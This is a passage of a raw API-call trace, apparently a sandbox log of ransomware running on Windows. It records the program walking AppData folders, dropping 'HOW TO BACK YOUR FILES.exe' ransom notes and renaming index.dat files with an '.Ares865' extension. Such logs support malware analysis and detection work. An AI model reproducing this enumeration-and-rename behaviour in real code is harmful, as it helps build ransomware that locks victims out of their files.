HALPmcxz\\AppData\\Local\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cec4580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cec4580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.147] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5" [0111.147] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5" [0111.148] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.148] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\low\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.148] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.149] GetLastError () returned 0x0 [0111.149] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.149] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ceea6e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ceea6e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.151] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\MSHist012017071220170713", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\MSHist012017071220170713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\MSHist012017071220170713" [0111.151] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\MSHist012017071220170713" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\MSHist012017071220170713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\MSHist012017071220170713" [0111.151] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.151] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\MSHist012017071220170713\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\low\\history.ie5\\mshist012017071220170713\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.152] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.152] GetLastError () returned 0x0 [0111.152] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.152] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\History.IE5\\MSHist012017071220170713\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x45c34df0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x6cf10840, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cf10840, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.153] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5" [0111.153] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5" [0111.153] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.153] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.154] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.154] GetLastError () returned 0x0 [0111.154] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.154] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cf10840, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cf10840, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.155] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\index.dat.Ares865") returned 81 [0111.155] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.155] GetLastError () returned 0x20 [0111.155] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 103 [0111.155] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 103 [0111.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.155] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x774c [0111.156] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x67, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x67, lpOverlapped=0x0) returned 1 [0111.156] CloseHandle (hObject=0x118) returned 1 [0111.156] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.156] CloseHandle (hObject=0x0) returned 0 [0111.156] CloseHandle (hObject=0x0) returned 0 [0111.156] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0111.156] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914" [0111.157] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914" [0111.157] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.157] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\history.ie5\\mshist012019091320190914\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.157] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.158] GetLastError () returned 0x0 [0111.158] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.158] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.158] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 106 [0111.158] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.158] GetLastError () returned 0x20 [0111.159] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 128 [0111.159] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 128 [0111.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.159] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x77b3 [0111.159] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x80, lpOverlapped=0x0) returned 1 [0111.160] CloseHandle (hObject=0x118) returned 1 [0111.160] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.160] CloseHandle (hObject=0x0) returned 0 [0111.160] CloseHandle (hObject=0x0) returned 0 [0111.160] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0111.160] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0111.160] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0111.160] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google" [0111.160] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google" [0111.160] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.160] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.161] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.161] GetLastError () returned 0x0 [0111.161] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.162] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports" [0111.162] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports" [0111.162] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.162] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\crashreports\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.163] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.163] GetLastError () returned 0x0 [0111.163] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.164] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" [0111.164] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" [0111.164] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.164] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.164] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.165] GetLastError () returned 0x0 [0111.165] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ddb73a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ddb73a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.165] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0111.166] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0111.166] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.166] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.166] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.167] GetLastError () returned 0x0 [0111.167] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.167] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6cf5cb00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cf5cb00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.167] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0111.167] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0111.167] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.168] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.168] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 